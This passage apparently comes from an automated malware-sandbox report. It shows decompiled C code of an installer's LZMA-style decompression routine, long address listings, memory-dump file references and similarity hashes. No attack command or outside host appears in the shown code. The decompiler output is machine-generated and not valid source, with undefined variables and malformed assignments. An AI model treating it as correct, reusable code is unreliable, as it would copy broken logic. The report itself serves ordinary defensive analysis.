														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                            0x00000000
                                            0x00406591
                                            0x00406591
                                            0x00406595
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x00406597
                                            0x00406597
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00406843
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x004068b6
                                            0x004068b6
                                            0x004068bc
                                            0x004068bc
                                            0x00406058
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061d4
                                            0x004061d6
                                            0x004061d9
                                            0x0040624a
                                            0x0040624d
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x004061db
                                            0x004061df
                                            0x004061e2
                                            0x004061e4
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x004061fc
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406211
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406221
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00000000
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622c
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406843
                                            0x00406840
                                            0x00000000
                                            0x00406595

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                            • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                            • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                            • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
